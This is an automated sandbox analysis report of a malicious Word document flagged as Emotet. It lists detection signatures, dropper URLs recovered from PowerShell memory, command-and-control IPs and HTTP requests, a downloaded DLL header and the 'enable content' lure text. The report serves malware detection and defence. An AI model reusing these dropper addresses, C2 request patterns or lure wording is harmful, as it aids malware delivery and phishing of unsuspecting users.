Analysis Report Arch_2021_717-1562532.doc

Overview

General Information

Sample Name: Arch_2021_717-1562532.doc
Analysis ID: 344339
MD5: d8358bce25bf7488068cfa9490205833
SHA1: 35c09dac297f82402a99de172600ba40d87c3ab7
SHA256: b253cf724dd411f9a433e2595d82ee412c28ae67c09ea0538d382334f2684f10

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://3musketeersent.net/wp-includes/TUgD/ Avira URL Cloud: Label: malware
Source: http://dashudance.com/thinkphp/dgs7Jm9/ Avira URL Cloud: Label: malware
Source: http://shannared.com/content/lhALeS/ Avira URL Cloud: Label: malware
Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/ Avira URL Cloud: Label: malware
Source: http://leopardcranes.com/zynq-linux-yaayf/w/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll ReversingLabs: Detection: 54%
Multi AV Scanner detection for submitted file
Source: Arch_2021_717-1562532.doc Virustotal: Detection: 16%
Source: Arch_2021_717-1562532.doc ReversingLabs: Detection: 27%
Machine Learning detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105632557.0000000002A50000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: shannared.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 51.255.203.164:8080
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 217.160.169.110:8080
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Tue, 26 Jan 2021 12:33:15 GMTContent-Disposition: attachment; filename="O9TGnKaUCw.dll"Content-Transfer-Encoding: binarySet-Cookie: 60100c0bb399f=1611664395; expires=Tue, 26-Jan-2021 12:34:15 GMT; Max-Age=60; path=/Last-Modified: Tue, 26 Jan 2021 12:33:15 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: application/octet-streamX-Cacheable: YES:ForcedContent-Length: 631808Accept-Ranges: bytesDate: Tue, 26 Jan 2021 12:33:15 GMTAge: 0Vary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    GET /content/lhALeS/ HTTP/1.1
    Host: shannared.com
    Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 84.232.229.24
Source: Joe Sandbox View IP Address: 192.169.223.13
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: OVHFR
Source: Joe Sandbox View ASN Name: RCS-RDS73-75DrStaicoviciRO
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    POST /zrm2/7son14/mlqmfbi2uji6/ HTTP/1.1
    DNT: 0
    Referer: 217.160.169.110/zrm2/7son14/mlqmfbi2uji6/
    Content-Type: multipart/form-data; boundary=--------orf6DU5u
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 217.160.169.110:8080
    Content-Length: 5748
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6528223-1CF8-4E74-AA78-05F4F57053A0}.tmp
Source: global traffic HTTP traffic detected:
    GET /content/lhALeS/ HTTP/1.1
    Host: shannared.com
    Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: shannared.com
Source: unknown HTTP traffic detected:
    POST /zrm2/7son14/mlqmfbi2uji6/ HTTP/1.1
    DNT: 0
    Referer: 217.160.169.110/zrm2/7son14/mlqmfbi2uji6/
    Content-Type: multipart/form-data; boundary=--------orf6DU5u
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 217.160.169.110:8080
    Content-Length: 5748
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://jeevanlic.com/wp-content/r8M/
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
Source: powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2109838810.0000000003A46000.00000004.00000001.sdmp String found in binary or memory: http://shannared.com
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://shannared.com/content/lhALeS/
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000009.00000002.2112546062.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2120498924.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2109055699.0000000000710000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2124089879.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2350246723.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2111700747.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2108942082.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2126847598.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2125021450.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2113404333.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2350021887.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2124035115.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2124200175.0000000000760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2126913357.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2107162967.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2116039169.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2125095238.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2120569228.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2111875145.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2127036397.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2112057590.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2124826552.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2349984443.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2116715619.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2106916506.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2106771774.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 8.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.780000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.780000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I , Word
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I , Words: 8,758 I US I N@m 1
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll
Very long command line found
Source: unknown Process created: Commandline size = 5677
Source: unknown Process created: Commandline size = 5576
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5576
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00771328 NtSetInformationKey, 8_2_00771328
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Kvmkgtcj\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00201ED9 9_2_00201ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002084D9 9_2_002084D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00205CDF 9_2_00205CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020E32D 9_2_0020E32D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00206934 9_2_00206934
